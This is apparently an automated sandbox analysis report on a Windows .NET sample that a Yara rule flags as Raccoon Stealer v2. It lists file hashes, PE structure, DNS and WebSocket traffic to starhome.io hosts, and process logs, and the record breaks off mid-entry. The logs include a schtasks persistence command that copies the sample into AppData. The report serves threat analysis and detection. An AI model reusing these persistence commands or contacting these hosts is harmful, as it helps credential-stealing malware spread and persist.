                                                                                                                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                General

                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Entropy (8bit):7.999846142951512
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:z5i6tLOUD0.exe
                                                                                                                                                                                                File size:21082624
                                                                                                                                                                                                MD5:035a4f79912dd1710c6a24324dddbb0b
                                                                                                                                                                                                SHA1:dbd4c4612a7fb75a8ae23294072e398ed47552fd
                                                                                                                                                                                                SHA256:417ea3585515662a88109b63a6ef89ef4ea592c35c0774f4d605d736254d1b12
                                                                                                                                                                                                SHA512:eaa889e7cad566cc990442f8070de7551a4d843bd62dee0efdc5df8762a19df0065d8fbfc7e1f3fa200803f717d296577a53b17fac7bf718558f9e9b5e9ef620
                                                                                                                                                                                                SSDEEP:393216:DX/jor0w17nb++l8qsyb6qPrxjS6/y+lRb0vQSMGxuBZMfJsA9eslHOJ:rsr0S7nb9l8EnrdPpl10vQSlRfJ5fO
                                                                                                                                                                                                TLSH:D8273332724541CFD4C60B75B783A7058B01EACADAA703EB52D33DB8C96E6231785D9B
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..c.................|A..4........A.. ....A...@.. ........................B...........@................................

                                                                                                                                                                                                File Icon

                                                                                                                                                                                                Icon Hash:6863eee6b292c6ee

                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                General

                                                                                                                                                                                                Entrypoint:0x1819ae6
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x63181D5B [Wed Sep 7 04:26:03 2022 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                Instruction
                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1419a9c0x4a.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x141a0000x31cf.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x141e0000xc.reloc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                Sections

                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x20000x1417aec0x1417c00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rsrc0x141a0000x31cf0x3200False0.38265625data5.066148726368563IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .reloc0x141e0000xc0x200False0.044921875data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                Resources

                                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                RT_ICON0x141a0940x128GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                RT_ICON0x141a1e00x568GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                RT_ICON0x141a76c0x2e8data
                                                                                                                                                                                                RT_ICON0x141aa780x8a8data
                                                                                                                                                                                                RT_ICON0x141b3440x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 224, next used block 65281
                                                                                                                                                                                                RT_ICON0x141b9d00xea8data
                                                                                                                                                                                                RT_GROUP_ICON0x141c8c60x5adata
                                                                                                                                                                                                RT_VERSION0x141c95c0x450data
                                                                                                                                                                                                RT_MANIFEST0x141cde80x3e7XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

                                                                                                                                                                                                Imports

                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Sep 12, 2022 10:18:55.285281897 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:18:55.315242052 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:55.315522909 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:18:55.336391926 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:18:55.368609905 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:55.369607925 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:55.379672050 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:18:55.409533978 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.181855917 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:18:56.181899071 CEST44349755188.114.96.3192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.182039022 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:18:56.183450937 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:18:56.183501959 CEST44349755188.114.96.3192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.229691982 CEST44349755188.114.96.3192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.246450901 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:18:56.246478081 CEST44349755188.114.96.3192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.247910023 CEST44349755188.114.96.3192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.248023987 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:18:56.251986027 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:18:56.252255917 CEST44349755188.114.96.3192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.252438068 CEST49755443192.168.2.6188.114.96.3
                                                                                                                                                                                                Sep 12, 2022 10:19:26.061028004 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:19:26.198405027 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:19:26.779997110 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:19:26.809763908 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:19:55.368666887 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:19:55.588829041 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:19:58.065274954 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:19:58.198371887 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:20:14.072887897 CEST610149753142.93.96.73192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:20:14.074223995 CEST497536101192.168.2.6142.93.96.73
                                                                                                                                                                                                Sep 12, 2022 10:20:26.134918928 CEST497536101192.168.2.6142.93.96.73

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Sep 12, 2022 10:18:55.218049049 CEST5562953192.168.2.68.8.8.8
                                                                                                                                                                                                Sep 12, 2022 10:18:55.240998030 CEST53556298.8.8.8192.168.2.6
                                                                                                                                                                                                Sep 12, 2022 10:18:56.157918930 CEST5656953192.168.2.68.8.8.8
                                                                                                                                                                                                Sep 12, 2022 10:18:56.178602934 CEST53565698.8.8.8192.168.2.6

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                Sep 12, 2022 10:18:55.218049049 CEST192.168.2.68.8.8.80xd134Standard query (0)register.starhome.ioA (IP address)IN (0x0001)
                                                                                                                                                                                                Sep 12, 2022 10:18:56.157918930 CEST192.168.2.68.8.8.80x13a8Standard query (0)files.starhome.ioA (IP address)IN (0x0001)

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                Sep 12, 2022 10:18:55.240998030 CEST8.8.8.8192.168.2.60xd134No error (0)register.starhome.io142.93.96.73A (IP address)IN (0x0001)
                                                                                                                                                                                                Sep 12, 2022 10:18:56.178602934 CEST8.8.8.8192.168.2.60x13a8No error (0)files.starhome.io188.114.96.3A (IP address)IN (0x0001)
                                                                                                                                                                                                Sep 12, 2022 10:18:56.178602934 CEST8.8.8.8192.168.2.60x13a8No error (0)files.starhome.io188.114.97.3A (IP address)IN (0x0001)

                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                • register.starhome.io:6101

                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                0192.168.2.649753142.93.96.736101C:\Program Files (x86)\WindowsNetService\node.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Sep 12, 2022 10:18:55.336391926 CEST5226OUTGET /strvn HTTP/1.1
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Sec-WebSocket-Key: 6vBj9xxRPKmrnN/oh+G2pw==
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                Host: register.starhome.io:6101
                                                                                                                                                                                                Sep 12, 2022 10:18:55.369607925 CEST5227INHTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Sec-WebSocket-Accept: NRD1WUQ5shRZNE2iK4X13Cmzj1s=
                                                                                                                                                                                                uWebSockets: 20


                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:10:17:38
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Users\user\Desktop\z5i6tLOUD0.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\z5i6tLOUD0.exe"
                                                                                                                                                                                                Imagebase:0x5f0000
                                                                                                                                                                                                File size:21082624 bytes
                                                                                                                                                                                                MD5 hash:035A4F79912DD1710C6A24324DDDBB0B
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000002.315220700.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:10:17:43
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f
                                                                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                Start time:10:17:43
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:10:17:43
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:cmd" /c copy "C:\Users\user\Desktop\z5i6tLOUD0.exe" "C:\Users\user\AppData\Roaming\cmd32.exe
                                                                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:10:17:44
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f
                                                                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                                                                File size:185856 bytes
                                                                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:10:17:44
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:10:17:46
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                                Imagebase:0x40000
                                                                                                                                                                                                File size:2688096 bytes
                                                                                                                                                                                                MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:10:17:46
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:10:17:48
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:10:17:48
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                Imagebase:0x7ff6089f0000
                                                                                                                                                                                                File size:163336 bytes
                                                                                                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:10:17:49
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:10:17:50
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 168
                                                                                                                                                                                                Imagebase:0xb80000
                                                                                                                                                                                                File size:434592 bytes
                                                                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:10:17:56
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\WingFtpServer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\WingFtpServer.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:20958709 bytes
                                                                                                                                                                                                MD5 hash:CF0D1C650627BF796FDC7775FDECB2E0
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:Borland Delphi

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:10:17:56
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
